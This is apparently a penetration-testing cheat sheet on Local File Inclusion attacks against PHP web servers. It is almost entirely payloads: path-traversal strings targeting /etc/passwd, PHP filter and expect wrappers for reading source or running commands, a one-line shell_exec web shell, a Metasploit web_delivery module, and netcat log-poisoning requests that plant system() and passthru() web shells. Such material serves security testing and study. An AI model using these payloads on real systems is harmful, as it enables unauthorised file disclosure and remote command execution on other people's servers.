[Local File Inclusion · pentestbook](https://chryzsh.gitbooks.io/pentestbook/content/local_file_inclusion.html)
### default log file locations on different OSes
#### Debian / Ubuntu Linux Apache
```
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
```
#### RHEL / Red Hat / CentOS / Fedora Linux Apache
```
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/nginx/access.log
```
#### FreeBSD Apache
```
/var/log/httpd-error.log
/var/log/httpd-access.log
```
#### else
```
/www/log/access_log
/log/access_log
/logs/access_log
```
### find the log location
```
/etc/apache2/envvars
```
### commonly used pseudo-protocols / wrappers
```
' and die(show_source('/etc/passwd')) or '
../../../etc/passwd
../../../etc/passwd%00
../../../etc/passwd%2500
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
....//....//etc/passwd
..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/./passwd
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
expect://ls
```
#### example
```
php://input&cmd=ls
<?php echo shell_exec($_GET['cmd']);?>
```
### msf module
```
use exploit/multi/script/web_delivery
```
### centos
```
apache
/var/log/httpd/access_log
/var/log/httpd/error_log
ftp
/var/log/proftpd
/var/log/xferlog
/var/log/xferlog.log
/etc/vsftpd/vsftpd.conf
ssh
/var/log/secure
```
### main config files
```
/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
```
### windows
```
C:\xampp\apache\logs\access.log
```
### attack to write a cmd-shell
```
nc solstice.vhost 80
GET <?php system($_GET['cmd']); ?> HTTP/1.1
nc solstice.vhost 80
GET <?php passthru($_GET['cmd']); ?> HTTP/1.1
```
### reference
[Local File Inclusion (LFI) — Web Application Penetration Testing | by Aptive | Medium](https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601)